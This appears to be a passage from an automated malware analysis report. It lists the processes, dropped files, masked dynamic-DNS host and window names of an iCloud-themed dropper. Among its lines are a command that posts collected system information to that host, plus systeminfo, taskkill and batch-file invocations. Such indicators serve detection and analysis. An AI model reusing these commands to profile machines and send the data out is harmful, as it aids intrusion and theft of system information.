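Technical Information
The entries below carry no group headings on this page. They comprise process command lines, file paths under %TEMP% and %WINDIR%, one network host (part of its name is replaced by '#'), and window class/name pairs. Two %WINDIR%\Temp paths appear twice, which suggests the list originally had separate groups (for example, files created and files deleted); confirm against the original report before relying on the grouping.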
- '<SYSTEM32>\taskkill.exe' /f /im IcloudMonitor.exe
- <SYSTEM32>\ntvdm.exe
- %TEMP%\7ZipSfx.000\icloud.exe
- %TEMP%\7ZipSfx.000\system32.ini
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- %WINDIR%\IcloudSecurity\icloud.ini
- %TEMP%\7ZipSfx.000\IcloudMonitor.exe
- %TEMP%\7ZipSfx.000\ipads.cmd
- %TEMP%\7ZipSfx.000\icloud.ini
- %TEMP%\7ZipSfx.000\icloud.ins
- %WINDIR%\Temp\scs2.tmp
- %WINDIR%\Temp\scs1.tmp
- 'ar####rt.myftp.org':80
- http://ar####rt.myftp.org/
- DNS ASK ar####rt.myftp.org
- ClassName: 'ConsoleWindowClass' WindowName: 'ntvdm-c6c.c70.380001'
- ClassName: '' WindowName: ''
- '%TEMP%\7ZipSfx.000\IcloudMonitor.exe' --post-data="comp=CRNJEUFU&id=vz_CRNJEUFU_is&sysinfo=Host Name: CRNJEUFU+###OS Name: Microsoft Windows XP Professional+###OS Version: 5.1.2600 S...
- '<SYSTEM32>\systeminfo.exe'
- '<SYSTEM32>\ntvdm.exe' -f
- '<SYSTEM32>\ping.exe' 127.0.0.1
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\7ZipSfx.000\ipads.cmd" "
- '<SYSTEM32>\find.exe' icloud.ins "Microsoft Windows XP"
- '<SYSTEM32>\cmd.exe' /c vol c: